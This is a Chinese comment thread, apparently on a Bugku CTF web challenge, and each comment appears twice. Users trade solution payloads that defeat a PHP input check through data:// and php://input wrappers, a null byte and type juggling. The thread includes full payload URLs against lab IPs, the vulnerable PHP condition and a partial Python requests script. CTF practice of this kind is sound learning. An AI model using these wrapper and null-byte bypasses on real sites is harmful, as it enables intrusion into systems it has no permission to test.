总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。
为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我
在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。
我也是,什么原因
?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=
http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111
伙伴们输入参数的时候一定不要带任何引号,不然不好使
第一步直接view-source:url/1p.html。第二步,如果用Bp就可以发现靶机php版本响应是5.5,一篇文章说php://input在5.3以后就不用了。所以小伙伴们不要纠结php://input了,使用data://协议吧
?id=0a&a=data://text/plain,bugku is a nice plateform!&b=?12345
import requests url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000' head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'} data='b
$data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
真的没懂
...
评论
冯飞99 1年前
举报
总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。
2089669143 1年前
举报
为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我
MiracleWolf 1年前
举报
在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。
莴笋要种泥里 1年前
举报
我也是,什么原因
evens 1年前
举报
?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=
wxy1343 1年前
举报
http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111
xclay 1年前
举报
伙伴们输入参数的时候一定不要带任何引号,不然不好使
Restwlaq 1年前
举报
第一步直接view-source:url/1p.html。第二步,如果用Bp就可以发现靶机php版本响应是5.5,一篇文章说php://input在5.3以后就不用了。所以小伙伴们不要纠结php://input了,使用data://协议吧
joyoung 1年前
举报
?id=0a&a=data://text/plain,bugku is a nice plateform!&b=?12345
zdfy005 1年前
举报
import requests url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000' head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'} data='b
zdfy005 1年前
举报
$data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
笨笨笨蛋 2年前
举报
真的没懂